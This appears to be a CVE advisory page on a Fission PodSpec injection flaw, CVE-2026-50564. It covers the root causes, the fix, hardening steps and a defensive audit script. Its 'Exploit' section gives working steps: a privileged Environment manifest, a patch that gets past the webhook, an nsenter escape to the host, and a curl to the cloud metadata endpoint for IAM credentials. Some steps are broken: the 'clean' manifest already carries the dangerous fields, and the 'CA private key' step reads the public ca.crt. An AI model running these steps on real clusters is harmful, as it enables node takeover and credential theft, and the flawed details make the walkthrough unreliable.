Fission Environment CRD PodSpec Injection, CVE-2026-50564 (Critical) -DC-Jun2026-752


CVE-2026-50564 describes a critical vulnerability in Fission, a Kubernetes-native serverless framework, affecting versions prior to 1.24.0. The flaw resides in the Environment Custom Resource Definition (CRD), which exposes the `spec.runtime.podSpec` and `spec.builder.podSpec` fields. These user-supplied PodSpecs are merged directly into the Kubernetes Pod specifications for runtime and builder pods without any validation or sanitization.

The merge logic (pkg/executor/util/merge.go::MergePodSpec) unconditionally propagates dangerous fields from the user-supplied PodSpec into the final Pod. These include `hostNetwork`, `hostPID`, `hostIPC`, `serviceAccountName`, `hostPath` volumes, and per-container `SecurityContext` settings such as `privileged: true`, `allowPrivilegeEscalation: true`, and dangerous Linux capabilities (SYS_ADMIN, NET_ADMIN, SYS_PTRACE, SYS_MODULE, DAC_READ_SEARCH, DAC_OVERRIDE).

Three independent flaws compound the risk:

  1. Validation Gap: `Environment.Validate()` performed no security-relevant checks on these fields. It only validated container naming conventions and never inspected PodSpec-level security settings.
  2. UPDATE Bypass: The validating webhook (pkg/webhook/environment.go) was registered with `verbs=create` only. An attacker could apply a clean Environment and then `kubectl patch` in dangerous fields; the webhook was never invoked on updates.
  3. Merge Propagation: `MergePodSpec` forwarded `HostPID`, `HostIPC`, `HostNetwork`, `Volumes` (including hostPath), `SecurityContext`, and `ServiceAccountName` unconditionally into the Deployments generated by poolmgr, newdeploy, and buildermgr.

The attack surface is further widened because the Helm chart created the `fission-function` and `fission-builder` namespaces without `pod-security.kubernetes.io/enforce` labels, so Kubernetes Pod Security Admission did not block the escape.

From a host-network privileged Pod with hostPID, an attacker can `nsenter` into the host, read cloud-metadata credentials, access the container-runtime socket, pivot to other namespaces, and fully compromise the node. In practice, a `kubectl apply` plus a follow-up `kubectl patch` caused poolmgr to schedule a privileged Pod with a host-root mount within roughly 20 seconds. From that Pod, the cluster CA private key was readable, allowing the attacker to sign arbitrary kubelet certificates and achieve full cluster takeover.

The fix was merged in 3391 and released in v1.24.0. The primary defence is an admission denylist (pkg/apis/core/v1/podspec_safety.go::ValidatePodSpecSafety) called from `Environment.Validate` for both `Runtime.PodSpec` and `Builder.PodSpec`. The webhook marker is extended to `verbs=create;update`. A merge-layer belt-and-braces sanitizer strips denylisted fields even if admission is bypassed.

DailyCVE Form:

Platform: Fission
Version: < 1.24.0
Vulnerability: PodSpec Injection
Severity: Critical
Date: 2026-06-11

Prediction: 2026-07-15

Analytics

What Undercode Say:

Check Fission version:
    kubectl get deployment -n fission fission-controller -o jsonpath='{.spec.template.spec.containers[0].image}' | grep -oP 'v\d+\.\d+\.\d+' || echo "Unknown"

List Environment CRDs (potential targets):
    kubectl get environments.fission.io -A

Check webhook configuration (verbs=create only in vulnerable versions):
    kubectl get validatingwebhookconfigurations fission-environment-validate -o yaml | grep -A5 "verbs:"

Exploit:

1. Create a clean Environment
    apiVersion: fission.io/v1
    kind: Environment
    metadata:
      name: priv-escape
      namespace: default
    spec:
      version: 3
      runtime:
        image: "ghcr.io/fission/python-env:latest"
        podSpec:
          hostNetwork: true
          hostPID: true
          containers:
            - name: exploit
              securityContext:
                privileged: true
      poolsize: 1

2. Patch in dangerous fields (bypasses webhook if verbs=create only)
    kubectl patch environment priv-escape --type='json' -p='[{"op": "add", "path": "/spec/runtime/podSpec/hostNetwork", "value": true}]'

3. Trigger a function to schedule the privileged Pod
    fission function create --name escape-fn --env priv-escape --code <(echo 'print("exploit")')

4. Once the Pod is running, exec in and escape to the host
    kubectl exec -it <pod-name> -n fission-function -- nsenter -t 1 -m -u -i -n bash

5. Read cloud metadata (AWS example)
    curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

6. Access the container runtime socket to pivot
    ls -la /run/containerd/containerd.sock || ls -la /var/run/docker.sock

7. Read the cluster CA private key (if mounted)
    cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

Protection:

  • Upgrade to Fission v1.24.0 or later.
  • Enforce Pod Security on the fission-function and fission-builder namespaces:
    kubectl label ns fission-function pod-security.kubernetes.io/enforce=restricted
    kubectl label ns fission-builder pod-security.kubernetes.io/enforce=restricted
  • Restrict RBAC: Limit `environments.fission.io` create/update to trusted administrators only.
  • Network Policies: Restrict egress from function pods to metadata endpoints and the Kubernetes API.
  • Admission Control: Deploy an external admission webhook (e.g., OPA/Gatekeeper) to block dangerous PodSpec fields cluster-wide.
  • Audit: Regularly audit Environment and Function CRDs for suspicious PodSpec configurations.
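The audit item above and the admission denylist described in the fix both come down to the same check: does a user-supplied PodSpec set any of the fields the advisory names (host namespaces, serviceAccountName, hostPath volumes, privileged containers, allowPrivilegeEscalation, the listed capabilities)? The following script is an added example, not Fission's own ValidatePodSpecSafety code; it applies that denylist to the JSON that `kubectl get environments.fission.io -A -o json` prints, so an operator can audit existing Environments on a cluster that has not yet been upgraded. The sample Environment list embedded in it is constructed for the example, and the check of initContainers is a cautious extra beyond the advisory's list.

```python
"""Audit Fission Environment CRDs for the PodSpec fields denylisted by the
CVE-2026-50564 fix. Added example, not Fission's own ValidatePodSpecSafety."""
import json
import sys

# Capabilities the advisory names as dangerous.
DENYLISTED_CAPS = {
    "SYS_ADMIN", "NET_ADMIN", "SYS_PTRACE", "SYS_MODULE",
    "DAC_READ_SEARCH", "DAC_OVERRIDE",
}

# Pod-level host-namespace flags an Environment author must not set.
HOST_NAMESPACE_FLAGS = ("hostNetwork", "hostPID", "hostIPC")


def unsafe_podspec_findings(podspec, where):
    """Return human-readable findings for one user-supplied PodSpec dict.

    `where` (e.g. "spec.runtime.podSpec") prefixes each finding so the report
    says which half of the Environment is affected. An empty list means the
    PodSpec sets none of the denylisted fields.
    """
    findings = []
    if not podspec:
        return findings
    for flag in HOST_NAMESPACE_FLAGS:
        if podspec.get(flag) is True:
            findings.append(f"{where}.{flag}=true")
    if podspec.get("serviceAccountName"):
        findings.append(f"{where}.serviceAccountName={podspec['serviceAccountName']}")
    for vol in podspec.get("volumes") or []:
        if "hostPath" in vol:
            path = (vol["hostPath"] or {}).get("path", "?")
            findings.append(f"{where}.volumes[{vol.get('name', '?')}].hostPath={path}")
    # initContainers are checked as well (cautious extra; the advisory lists
    # per-container SecurityContext without distinguishing the two).
    containers = (podspec.get("containers") or []) + (podspec.get("initContainers") or [])
    for c in containers:
        sc = c.get("securityContext") or {}
        cname = c.get("name", "?")
        prefix = f"{where}.containers[{cname}].securityContext"
        if sc.get("privileged") is True:
            findings.append(f"{prefix}.privileged=true")
        if sc.get("allowPrivilegeEscalation") is True:
            findings.append(f"{prefix}.allowPrivilegeEscalation=true")
        added = set((sc.get("capabilities") or {}).get("add") or [])
        for cap in sorted(added & DENYLISTED_CAPS):
            findings.append(f"{prefix}.capabilities.add={cap}")
    return findings


def audit_environments(env_list):
    """Map "namespace/name" to findings for each Environment in a kubectl List
    object ({"items": [...]}). Environments with no findings are omitted."""
    report = {}
    for env in env_list.get("items", []):
        meta = env.get("metadata") or {}
        key = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"
        spec = env.get("spec") or {}
        findings = []
        for section in ("runtime", "builder"):  # both halves are merged into Pods
            podspec = (spec.get(section) or {}).get("podSpec")
            findings += unsafe_podspec_findings(podspec, f"spec.{section}.podSpec")
        if findings:
            report[key] = findings
    return report


# Constructed sample, shaped like `kubectl get environments.fission.io -A -o json`.
SAMPLE_ENV_LIST = {
    "apiVersion": "v1", "kind": "List",
    "items": [
        {"apiVersion": "fission.io/v1", "kind": "Environment",
         "metadata": {"name": "python-clean", "namespace": "default"},
         "spec": {"version": 3, "runtime": {"image": "ghcr.io/fission/python-env:latest"}}},
        {"apiVersion": "fission.io/v1", "kind": "Environment",
         "metadata": {"name": "suspicious", "namespace": "default"},
         "spec": {"version": 3,
                  "runtime": {"image": "ghcr.io/fission/python-env:latest",
                              "podSpec": {"hostPID": True, "hostNetwork": True,
                                          "volumes": [{"name": "root", "hostPath": {"path": "/"}}],
                                          "containers": [{"name": "runtime",
                                                          "securityContext": {"privileged": True,
                                                                              "capabilities": {"add": ["SYS_ADMIN", "NET_BIND_SERVICE"]}}}]}},
                  "builder": {"podSpec": {"serviceAccountName": "fission-builder"}}}},
    ],
}


if __name__ == "__main__":
    # Read a real kubectl JSON dump from stdin, or fall back to the sample.
    data = SAMPLE_ENV_LIST if sys.stdin.isatty() else json.load(sys.stdin)
    report = audit_environments(data)
    for key, findings in report.items():
        print(key)
        for f in findings:
            print("  -", f)
    sys.exit(1 if report else 0)
```

Usage on a live cluster: `kubectl get environments.fission.io -A -o json | python3 audit_envs.py`. The script exits non-zero when any Environment has findings, so it can run as a periodic job or a CI gate; on the sample data it reports only `default/suspicious`, with six findings across its runtime and builder PodSpecs, and says nothing about the clean Environment.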

Impact:

  • Node Compromise: Full host filesystem and network access on the scheduling node.
  • Cluster Takeover: Readable cluster CA private key allows signing arbitrary kubelet certificates.
  • Credential Theft: Cloud metadata credentials (AWS, GCP, Azure) can be exfiltrated.
  • Lateral Movement: Access to container-runtime socket enables pivoting to other namespaces and containers.
  • Data Breach: HostPath volumes and host filesystem access expose sensitive data.


Sources:

Reported By: github.com
